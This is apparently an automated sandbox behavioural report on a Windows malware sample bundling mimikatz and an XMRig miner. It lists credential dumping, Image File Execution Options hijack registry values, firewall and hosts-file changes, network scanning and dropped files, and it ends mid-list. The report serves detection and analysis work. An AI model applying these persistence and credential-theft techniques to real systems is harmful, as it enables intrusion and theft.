Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
01-09-2024 11:47
Behavioral task
behavioral1
Sample
2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe
-
Size
8.5MB
-
MD5
53bc5ff9113f5c87da313d0a8f9e4e19
-
SHA1
6a392a29f4421f6a65cedf99001fadb498514a3d
-
SHA256
e6759015a43186863e34019080740cf11a56f1683da6b71cb112b9b4e6b19a0a
-
SHA512
8d871c36cf5765ebc3c4e97093e142e5cd94a9c2d78d62a5788ae59269fc5f249de3f5ed60d55a6d24819a281d2fc11c61b245ba9c26fcc83041621c7ef95c81
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1948 created 1772 1948 emzriir.exe 37 -
Contacts a large (19556) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4908-178-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-182-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-199-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-212-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-218-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-233-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-250-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-268-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-269-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig behavioral2/memory/4908-271-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
resource yara_rule behavioral2/memory/2104-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2104-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00090000000234b2-6.dat mimikatz behavioral2/memory/4116-138-0x00007FF6BADE0000-0x00007FF6BAECE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts emzriir.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts emzriir.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe emzriir.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2704 netsh.exe 808 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4000 emzriir.exe 1948 emzriir.exe 3036 wpcap.exe 2348 nnbuyeerm.exe 4116 vfshost.exe 436 zhcbccpzr.exe 540 xohudmc.exe 1276 wooakm.exe 4908 bnidgq.exe 964 zhcbccpzr.exe 1064 zhcbccpzr.exe 4392 zhcbccpzr.exe 4656 zhcbccpzr.exe 3136 zhcbccpzr.exe 3816 zhcbccpzr.exe 4568 zhcbccpzr.exe 3884 zhcbccpzr.exe 4412 zhcbccpzr.exe 3828 zhcbccpzr.exe 112 zhcbccpzr.exe 4504 zhcbccpzr.exe 4140 zhcbccpzr.exe 2216 zhcbccpzr.exe 1632 zhcbccpzr.exe 4104 zhcbccpzr.exe 4828 emzriir.exe 2212 zhcbccpzr.exe 4896 bbqlvcqnq.exe -
Loads dropped DLL 12 IoCs
pid Process 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 3036 wpcap.exe 2348 nnbuyeerm.exe 2348 nnbuyeerm.exe 2348 nnbuyeerm.exe -
resource yara_rule behavioral2/files/0x000700000002350e-134.dat upx behavioral2/memory/4116-136-0x00007FF6BADE0000-0x00007FF6BAECE000-memory.dmp upx behavioral2/memory/4116-138-0x00007FF6BADE0000-0x00007FF6BAECE000-memory.dmp upx behavioral2/files/0x0007000000023519-141.dat upx behavioral2/memory/436-142-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/436-150-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/files/0x0007000000023516-164.dat upx behavioral2/memory/4908-165-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/964-171-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/1064-175-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-178-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4392-180-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-182-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4656-185-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/3136-189-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/3816-193-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4568-197-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-199-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/3884-202-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4412-206-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/3828-210-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-212-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/112-215-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-218-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4504-220-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4140-224-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/2216-228-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/1632-232-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-233-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4104-235-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/2212-239-0x00007FF6F8800000-0x00007FF6F885B000-memory.dmp upx behavioral2/memory/4908-250-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4908-268-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4908-269-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx behavioral2/memory/4908-271-0x00007FF67E5E0000-0x00007FF67E700000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 89 ifconfig.me 90 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE emzriir.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 emzriir.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emzriir.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\wooakm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 emzriir.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\kgkufnrnc\UnattendGC\AppCapture64.dll emzriir.exe File created C:\Windows\kgkufnrnc\upbdrjv\swrpwe.exe emzriir.exe File created C:\Windows\ime\emzriir.exe emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\tibe-2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\trch-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\vimpcsvc.exe emzriir.exe File opened for modification C:\Windows\kgkufnrnc\Corporate\log.txt cmd.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\svschost.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\spoolsrv.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\spoolsrv.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\docmicfg.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\cnli-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\exma-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\trfo-2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\tucl-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\Corporate\mimidrv.sys emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\crli-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\ucl.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\schoedcl.exe emzriir.exe File created C:\Windows\znrgncrv\svschost.xml emzriir.exe File created C:\Windows\znrgncrv\schoedcl.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\svschost.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\spoolsrv.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\emzriir.exe 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\Packet.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\libxml2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe emzriir.exe File created C:\Windows\znrgncrv\docmicfg.xml emzriir.exe File opened for modification C:\Windows\kgkufnrnc\uhbggiaeb\Result.txt bbqlvcqnq.exe File created C:\Windows\kgkufnrnc\Corporate\vfshost.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\docmicfg.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\docmicfg.xml emzriir.exe File created C:\Windows\znrgncrv\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe emzriir.exe File opened for modification C:\Windows\znrgncrv\vimpcsvc.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\bbqlvcqnq.exe emzriir.exe File created C:\Windows\kgkufnrnc\Corporate\mimilib.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\posh-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\ssleay32.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\xdvl-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\zlib1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\svschost.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\spoolsrv.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\libeay32.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\docmicfg.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\svschost.xml emzriir.exe File created C:\Windows\znrgncrv\spoolsrv.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\coli-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\AppCapture32.dll emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\ip.txt emzriir.exe File created C:\Windows\znrgncrv\emzriir.exe 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe File opened for modification C:\Windows\kgkufnrnc\uhbggiaeb\Packet.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\Shellcode.ini emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\scan.bat emzriir.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1976 sc.exe 2520 sc.exe 5116 sc.exe 4236 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language emzriir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wooakm.exe Key opened 